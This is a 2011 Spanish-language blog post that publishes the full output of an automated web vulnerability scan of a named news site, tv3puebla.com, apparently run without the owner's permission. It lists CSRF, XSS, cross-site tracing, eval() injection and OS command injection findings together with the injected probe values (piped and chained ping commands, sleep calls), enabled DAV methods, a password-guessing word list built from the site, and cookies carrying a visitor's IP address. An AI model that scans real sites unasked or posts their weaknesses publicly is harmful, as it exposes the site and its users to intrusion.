lunes, 30 de mayo de 2011

script en http://www.tv3puebla.com/esmas/

Saludos Mundo Libre.

He aqui una vulnerabilidad en http://www.tv3puebla.com/esmas/

http://www.tv3puebla.com/esmas/

[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.collectCookies
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.error500
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: discovery.serverHeader
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: discovery.allowedMethods
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: discovery.frontpage_version
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.passwordProfiling
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.getMails
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.lang
[Mon 30 May 2011 11:51:02 AM CDT] The page language is: es
[Mon 30 May 2011 11:51:03 AM CDT] The server header for the remote web server is: "Apache/2.2.3 (Red Hat)". This information was found in the request with id 83.
[Mon 30 May 2011 11:52:53 AM CDT] The URL: "http://www.tv3puebla.com/esmas/" has the following DAV methods enabled:
[Mon 30 May 2011 11:52:53 AM CDT] - *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACE, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL
[Mon 30 May 2011 11:52:53 AM CDT] Starting formAuthBrute plugin execution.
[Mon 30 May 2011 11:52:53 AM CDT] Starting basicAuthBrute plugin execution.
[Mon 30 May 2011 11:52:53 AM CDT] Found 2 URLs and 2 different points of injection.
[Mon 30 May 2011 11:52:53 AM CDT] The list of URLs is:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas/
[Mon 30 May 2011 11:52:53 AM CDT] The list of fuzzable requests is:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas | Method: GET | Parameters: (s="Buscar...")
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas/ | Method: GET
[Mon 30 May 2011 11:52:53 AM CDT] The web application sent a persistent cookie.
[Mon 30 May 2011 11:52:53 AM CDT] The following scripts are vulnerable to a trivial form of XSRF:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas
[Mon 30 May 2011 11:53:15 AM CDT] The URL: http://www.tv3puebla.com/esmas is vulnerable to cross site request forgery.
[Mon 30 May 2011 11:53:15 AM CDT] The server header for the remote web server is: "Apache/2.2.3 (Red Hat)". This information was found in the request with id 83.
[Mon 30 May 2011 11:53:15 AM CDT] The URL "http://www.tv3puebla.com/esmas/" has the following allowed methods, which include DAV methods: *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACE, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL.
[Mon 30 May 2011 11:53:15 AM CDT] The URL: "http://www.tv3puebla.com/esmas" sent the cookie: "bb2_screener_=1306774395+189.131.40.162; path=/esmas/". This information was found in the request with id 138.
[Mon 30 May 2011 11:53:33 AM CDT] A possible ReDoS was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21". . Please review manually. This information was found in the request with id 206.
[Mon 30 May 2011 11:54:40 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:40 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:40 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:41 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:43 AM CDT] A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=ping+-c+9+localhost".Please review manually. This information was found in the request with id 227.
[Mon 30 May 2011 11:55:18 AM CDT] eval() input injection was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=sleep(9)%3B". . Please review manually. This information was found in the request with id 330.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:46 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:46 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:54 AM CDT] Cross Site Scripting was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 371.
[Mon 30 May 2011 11:55:54 AM CDT] The web server at "http://www.tv3puebla.com/esmas/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 393.
[Mon 30 May 2011 11:57:03 AM CDT] Password profiling TOP 100:
[Mon 30 May 2011 11:57:03 AM CDT] - [1] Puebla with 910 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [2] Noticias with 684 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [3] Diario with 657 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [4] Clima with 450 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [5] Twitter with 367 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [6] Salud with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [7] Especiales with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [8] Deportes with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [9] Infantiles with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [10] Cocina with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [11] Espacio with 342 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [12] minutes with 339 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [13] Espect with 234 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [14] Inicio with 234 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [15] culos with 234 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [16] Buscar with 212 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [17] como with 171 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [18] ireriherrera with 166 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [19] Acuerdo with 166 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [20] Legislativo with 166 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [21] Ignacio with 166 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [22] TV3Puebla with 147 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [23] patrullas with 128 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [24] seguridad with 127 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [25] presuntos with 120 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [26] Sapos with 119 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [27] Detenidos with 118 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [28] onda with 118 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [29] calor with 118 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [30] golpeadores with 118 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [31] Powered with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [32] Sunrise with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [33] ONVOS with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [34] Principio with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [35] KoffyMedia with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [36] Sunset with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [37] High with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [38] Programaci with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [39] Refuerzan with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [40] Regresar with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [41] Versi with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [42] entrega with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [43] Wind with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [44] Contacto with 117 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [45] esta with 110 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [46] Piedad with 109 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [47] General with 109 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [48] Acalorada with 109 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [49] Recientes with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [50] Musicales with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [51] Home with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [52] Usted with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [53] Busqueda with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [54] Entretenimiento with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [55] Publicidad with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [56] Categorias with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [57] Elegir with 108 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [58] sentimos with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [59] ningun with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [60] resultado with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [61] busqueda with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [62] arrojo with 107 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [63] interior with 84 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [64] identificado with 84 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [65] programa with 84 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [66] carriles with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [67] minutos with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [68] califica with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [69] Diagonal with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [70] Defensores with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [71] Tello with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [72] hour with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [73] Mejora with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [74] ambos with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [75] especial with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [76] Gobernador with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [77] Firman with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [78] Miguel with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [79] Congreso with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [80] Hallazgo with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [81] Mausoleo with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [82] RafaGobernador with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [83] sentidos with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [84] barranca with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [85] unos with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [86] Zaragoza with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [87] Calzada with 83 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [88] Aparatoso with 52 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [89] ebriedad with 52 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [90] estado with 52 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [91] accidente with 52 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [92] chofer with 51 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [93] Deje with 30 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [94] Escrito with 30 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [95] Comentario with 30 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [96] Tagged with 27 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [97] with with 27 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [98] this with 25 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [99] refresh with 25 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] - [100] Please with 25 repetitions.
[Mon 30 May 2011 11:57:03 AM CDT] The URL: "http://www.tv3puebla.com/esmas" sent these cookies:
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774453+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774590+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] The URL: "http://www.tv3puebla.com/esmas/" sent these cookies:
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774294+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] Finished scanning process.


xsrf:get_xsrf Cross site request forgery vulnerability

The URL: http://www.tv3puebla.com/esmas is vulnerable to cross site request forgery.

osCommanding:Possible OS commanding vulneravility

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=ping+-c+9+localhost".Please review manually. This information was found in the request with id 227.

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=%26%26/usr/sbin/ping+-s+localhost+1000+10+".Please review manually. This information was found in the request with id 237.

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=%7Cping+-n+3+localhost".Please review manually. This information was found in the request with id 241.

xss:xss:Cross site scipting vulnerability

Cross Site Scripting was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 371.

xst:xst:Cross site tracing vulnerability.

The web server at "http://www.tv3puebla.com/esmas/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 393.



Hay se las dejo Saludos Mundo Libre.

No hay comentarios:

Publicar un comentario